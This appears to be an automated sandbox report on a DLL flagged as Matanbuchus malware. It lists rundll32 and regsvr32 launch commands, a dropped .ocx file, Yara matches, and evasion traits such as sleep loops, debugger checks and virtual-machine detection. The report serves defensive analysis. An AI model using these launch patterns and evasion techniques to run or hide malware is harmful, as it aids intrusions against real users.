Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInit	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Init	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winrnr.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Yara detected Matanbuchus

Source: file.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: Yara match	File source: file.dll, type: SAMPLE
Source: Yara match	File source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D15C6 push ecx; ret	14_2_7F3D15D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE15C6 push ecx; ret	18_2_7EDE15D9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE15C6 push ecx; ret	34_2_7EEE15D9

Drops PE files

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\8f08\user-PC\user-PC.ocx

Hooking and other Techniques for Hiding and Protection

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49994

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_7EDCC7B0 GetSystemDefaultLangID,IsIconic,SetLastError,GetCommandLineW,lstrlenA,GetSystemDefaultLCID,

18_2_7EDCC7B0

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to query network adapater information

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetAdaptersInfo,	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetAdaptersInfo,	18_2_7EDBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetAdaptersInfo,	34_2_7EEBB430

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\rundll32.exe

Dropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.ocx

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.5 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.5 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 5.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172	Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172	Thread sleep time: -130000s >= -30000s

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_7F3AAF80 GetSystemInfo,

14_2_7F3AAF80

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 130000
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 130000

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_7F3E6967 IsDebuggerPresent,OutputDebugStringW,

14_2_7F3E6967

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AAF80 mov edx, dword ptr fs:[00000030h]	14_2_7F3AAF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B0DD0 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B0DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AE860 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AE860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3728BF mov edx, dword ptr fs:[00000030h]	14_2_7F3728BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov ecx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov eax, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3B4560 mov edx, dword ptr fs:[00000030h]	14_2_7F3B4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov eax, dword ptr fs:[00000030h]	14_2_7F3AB430
